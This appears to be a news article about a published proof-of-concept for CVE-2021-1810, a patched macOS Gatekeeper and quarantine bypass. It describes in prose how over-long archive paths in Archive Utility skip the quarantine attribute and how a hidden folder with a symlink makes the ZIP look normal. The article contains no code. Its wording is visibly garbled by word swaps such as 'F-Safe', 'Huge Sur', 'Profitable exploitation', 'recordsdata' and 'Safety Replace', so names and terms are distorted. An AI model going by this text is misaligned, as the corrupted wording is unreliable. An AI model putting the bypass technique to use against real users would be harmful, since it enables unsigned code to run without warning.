Rasmus Sten, a software program engineer with F-Safe, has launched proof-of-concept (PoC) exploit code for a macOS Gatekeeper bypass that Apple patched in April this year.
The PoC exploit targets CVE-2021-1810, a vulnerability that may result in the bypass of all three protections that Apple carried out in opposition to malicious file downloads, particularly file quarantine, Gatekeeper, and notarization.
This subject was discovered within the Archive Utility element of macOS Huge Sur and Catalina and could be exploited utilizing a specifically crafted ZIP file. Profitable exploitation requires for the attacker to trick the person into downloading and opening the archive to execute the malicious code inside.
By exploiting the vulnerability, an attacker may execute unsigned binaries on macOS units, even with Gatekeeper imposing code signatures and with out the person being alerted to the malicious code execution.
The vulnerability, Sten explains, is said to the style during which the Archive Utility handles file paths. Particularly, the software program engineer found that, for paths longer than 886 characters, the com.apple.quarantine prolonged attribute would now not apply, leading to a Gatekeeper bypass for the recordsdata.
Whereas researching edge instances with lengthy path filenames, Sten found that some macOS elements behaved unexpectedly when the overall path size reached a sure restrict.
Ultimately, Sten found that it was attainable to create an archive with a hierarchical construction for which the trail size was lengthy sufficient in order that Safari would name Archive Utility to unpack it and that Archive Utility wouldn’t apply the com.apple.quarantine attribute, however brief sufficient to be browsable utilizing Finder and for macOS to execute the code inside.
“With a purpose to make it extra interesting to the person, the archive folder construction might be hidden (prefixed with a full cease) with a symbolic hyperlink within the root which was nearly indistinguishable from a single app bundle within the archive root,” the researcher explains.
Sten, who additionally launched a video demo of the exploit, has revealed PoC code that creates the archive with the trail size essential to bypass CVE-2021-1810, together with a symbolic hyperlink to make the ZIP file look regular.
The vulnerability was addressed with the discharge of macOS Huge Sur 11.3 and Safety Replace 2021-002 for Catalina.